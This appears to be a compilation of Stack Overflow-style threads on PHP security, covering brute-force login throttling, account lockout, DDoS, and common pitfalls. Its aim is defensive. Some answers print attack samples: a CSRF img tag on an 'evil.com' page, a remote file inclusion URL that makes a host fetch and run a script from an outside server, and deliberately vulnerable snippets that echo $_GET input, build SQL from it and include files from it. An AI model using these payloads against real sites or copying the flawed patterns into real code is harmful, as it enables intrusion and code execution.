DDOS has nothing to do with it. DDOS = Distributed denial of service, it means someone will trigger a lot of computers to ask for a service in your website and your server won't be able to handle the load. This will prevent your server to give a service for "honest" users and that's why it's called "denial of service". Preventing DDOS attacks can be tricky. The only way of handling it, is not providing a service to certain IP's or users with IPs from the areas you're being attacked from. If you want to protect your site from brute force attack (assuming someone wants to hack into a user account) you should: Use a good and well secured logging system. That means, using a good hashing function and salting the users passwords. Use your second option - record the IP of a user who failed to access his account and don't let him try for 2-3 seconds. If he fails 2-3 more times, block him for 15 minutes, this will be enough time to protect your users accounts.
Cookies can be disabled in browser. All modern browsers support such a feature. When security is a concern, never rely on client. A really simple approach is delaying the announcement of success/failure of login. Just call sleep. This is however not safe as many attempts to login can be made in parallel. A single-threaded attack is slowed down, though. When storing info about last attempts to login, you should consider what info is really good for blocking a brute-force attack on your login system. When forcing timeout between login attempts on a username, the attacker could try the same password for all logins and by the time he wants to try another password, the login delay for first username already expires. Forcing login delay for an IP address is better approach as IP addresses are a rather limited resource for an attacker. When performing a distributed attack, the delay is not forced between all attempts, it is forced between all attempts from the same IP address. Combining more methods is a good idea, anyway, as well as logging all attempts to log in. See also Securing login forms from brute-force attacks using queues # Dream.In.Code What is the best method to prevent a brute force attack? How can I throttle user login attempts in PHP* increasing time delay for login to stop bruteforcing, good idea? How to delay login attempts after too many tries (PHP)
Here's some info on DDOS in a PHP environment that might be helpful: How to enable DDoS protection?
ACUNETIX - Login page password-guessing attack - brute force attack and Account Lockout
Can any one please let me know about the term "Account Lockout"? and how do i implement it on PHP. The below information i got from one of the web site security/audit tool called "ACUNETIX". Description "A common threat web developers face is a password-guessing attack known as a brute force attack. A brute force attack is an attempt to discover a password by systematically trying every possible combination of letters, numbers and symbols until you discover the one correct combination that works. This login page does not have any protection against password-guessing attacks(brute force attack). Consult Web references for more information about fixing this problem. Impact An attacker may attempt to discover a week password by systematically trying every possible combination of letters, numbers and symbols until it discovers the one correct combination that works. Recommendation It's recommended to implement some type of account lockout after a defined number of incorrect password attempts."
Account lockout is password policy that may be used to lock user accounts after too many failed bind attempts. Once an account has been locked, that user will not be allowed to authenticate. you can look on this php example http://www.weberdev.com/get_example-1380.html you need to save in the db how many times the user try and fail to login, after 3 times , you block the user from enter your site
OpenID You SHOULD not create login system yourself but use OpenID(LightOpenID is a very good openid library for php). The good openid providers already have measurements against this in place. CAPTCHA But if you really want to do it yourself the easiest way to protect yourself against this is validating that user(no automated script) submits your form be using CAPTCHA. In my opinion all the others schemes could have flaws. But some scheme you could also use is let your script sleep on invalid login(increase it with each wrong try).
Common unknown PHP security pitfalls
I know questions like this have been asked a hundred of times, but mine is a little different. I know about all the common and widely-known security issues like SQL injection, XSS etc. But what about issues that often appear but are not recognized most of the times or not judged as vulnerabilities? Are there any?
One thing I've seen a lot that gets developed as a feature and not seen as a security hole until it's too late are state-changing GET requests. These can easily result in cross-site request forgery. For example, your application could have a link to http://mysite.com/logout which logs users out. But a third party site can add code like this: <!-- on evil.com site --> <img src="http://mysite.com/logout"> Then when users load the page on evil.com, they are logged out of mysite.com! The worst problems happen when sites implement an API using state-changing GET requests. For example, if I ran a social networking site with urls like site.com/addfriend, site.com/sendmessage, etc. and I gave out those urls to developers who were going to make applications for my site, the developers would have to deal with an API change when the security vulnerability was discovered.
Using $_REQUEST instead of $_GET or $_POST, which is a bad idea because $_REQUEST also contains cookies, and it opens the door for Variable Fixation Not really PHP-specific, applies to all the interpreted languages: visibility of .svn/.CVS directories
Here are a few that I've worked on: Storing passwords as plaintext in a DB If your site is hacked, hackers have access to all of your users' passwords and emails. Consider how many users have the same password for their email as well as your site. Storing emails in the same table as your users If a SQL injection attack gives a hacker access to your user table, one of the only pieces of valuable information is the email address. Keep it in a separate table to make it more difficult for the hacker. If you don't intend on emailing the user, only store the hash of their email: a hacker that gets access to user emails can sell them to spammers. Even if you have a password-protected site, do the math as to how secure the password are. I had a friend whose site used a simple 5-digit number for passwords. I cracked it in about an hour. If you're sending communications that have value (i.e.: you're performing an operation that uses a significant amount of resources: cpu, memory, etc.), always require a token from the user that's timestamped. If a hacker finds that you have an operation that costs you $0.0001 every time it's hit, they can farm out a botnet to rack up charges on your name. Require the user send a hash (a unique ID for the user, a timestamp, and a secret salt) along with a plaintext timestamp. The plaintext timestamp lets you validate that you didn't give them permission last Tuesday, the timestamp in the hash lets you validate that the has belongs with that message, the UID in the has ensures that the hacker didn't jack the request from someone else, and the secret salt in the hash ensures that they didn't generate it on their own. If you're writing a plugin system for an application, be wary of what you store in private variables. Check out this article I wrote on how to lock it down. Just a few ideas and things I've dealt with. Hope it helps!
I worked on a pile of junk once where fopen handlers were enabled as was "register globals." The includes looked like: <?php include $MY_BASE . '/includes/myLib.inc'; ?> What this allowed anyone to do is remotely execute any code they wanted. Behold: http://exploitablehost.com/?MY_BASE=http://viagra.cheeper.com/myScript.txt%3f PHP will fetch the text file over HTTP and execute it locally. Since Apache was running as root... well, you get the idea.
Lack of procedures to protect against social engineering attacks? For example, an attacker calling an office and impersonating someone for the purpose of obtaining passwords. Poor password-creation, distribution, and protection policy. FTP account cracking can result in malicious code being uploaded to your site. Weak/vulnerable third-party hosting servers can result in your site being compromised no matter how much time you spent making it secure.
Here are some of the common pitfalls i have seen: 1. Not escaping entities It's basic knowledge; ALL untrusted input (especially user input from forms) has to be sanitized before it is being output. echo $_GET['username']; 2. Not Escaping SQL input $query = "select * fromt able where id = {$_GET['id']}"; 3. Requiring and including files incorrectly include($_GET['filename']); 4. Double escaping quotes If magic_quotes_gpc is true, then using addslahes will add one more slash thereby adding two slashes in all.
PHP has been around for more than 10 years and it matured a lot. Beware of lax defaults in php.ini.
Many of the posts are not specific to PHP. I am sure there are some language pitfalls but as you see in the posts it is very important to implement best practices in security (like filtering user input). A good start for secure web apps is OWASP. And to be on topic: Security Issues in PHP on OWASP. Cheers